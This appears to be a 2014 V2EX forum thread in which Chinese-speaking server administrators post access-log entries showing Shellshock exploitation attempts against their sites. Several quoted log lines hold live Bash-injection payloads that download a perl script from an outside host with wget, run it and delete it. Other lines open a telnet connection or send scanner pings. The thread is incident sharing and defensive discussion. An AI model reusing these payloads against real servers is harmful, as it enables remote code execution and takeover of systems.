Bash 漏洞:服务器被扫描了。。。

2014-09-26 19:16:12 +08:00
 juicy
看到了一条日志记录:

74.201.85.77 - - [26/Sep/2014:07:35:27 +0000] "GET / HTTP/1.0" 403 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"


然后我登录了 http://208.118.61.44/wow1 这个文件,吓尿了。。。有perl大神能告诉我这个脚本是干啥的吗?
4526 次点击
所在节点    分享发现
11 条回复
20150517
2014-09-26 19:28:48 +08:00
中马了
LazyZhu
2014-09-26 19:33:11 +08:00
http://193.2.50.126/stuff/linux/dbot.txt
kingwkb
2014-09-26 20:16:46 +08:00
检查了下,的确有

54.251.83.67 - - [26/Sep/2014:13:42:09 +0800] "GET / HTTP/1.1" 200 2664 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a"
74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET / HTTP/1.0" 200 2664 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET /test-cgi/test.sh HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET /cgi-bin/test.sh HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET /cgi-bin/php HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
xd547
2014-09-26 20:19:42 +08:00
貌似我的也被扫描了
$ sudo cat * |grep bash
209.126.230.72 - - [25/Sep/2014:14:10:39 +0800] "GET / HTTP/1.0" 301 178 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
114.91.107.58 - - [26/Sep/2014:00:54:00 +0800] "GET / HTTP/1.1" 301 178 "-" "() { :;}; /bin/bash -c \x22telnet 197.242.148.29 9999\x22"
198.46.135.194 - - [26/Sep/2014:03:15:06 +0800] "GET / HTTP/1.0" 301 178 "() { :; }; ping -c 3 198.46.158.94" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
janxin
2014-09-26 20:51:48 +08:00
看起来就是执行了个后门perl...
arcas
2014-09-26 20:53:25 +08:00
E486: 找不到模式: bash
binux
2014-09-26 20:56:48 +08:00
74.201.85.67 - - [26/Sep/2014:14:37:00 +0400] "GET /cgi-bin/test.sh HTTP/1.0" 500 192 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" "-"

也有,还是个相近的ip
binux
2014-09-26 21:01:33 +08:00
还有人干这个。。

209.126.230.72 - - [25/Sep/2014:10:24:48 +0400] "GET / HTTP/1.0" 500 192 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" "-"
fanta
2014-09-27 01:34:54 +08:00
那个服务器好像关了,wow1不能访问了.
chijiao
2014-09-27 10:17:27 +08:00
我的也被扫描了,我的解决方案是用squid做代理
sorcerer
2014-09-28 11:11:05 +08:00
我也被执行过这个脚本,能告诉我具体脚本做了啥吗.好有相应动作.

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/135893

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX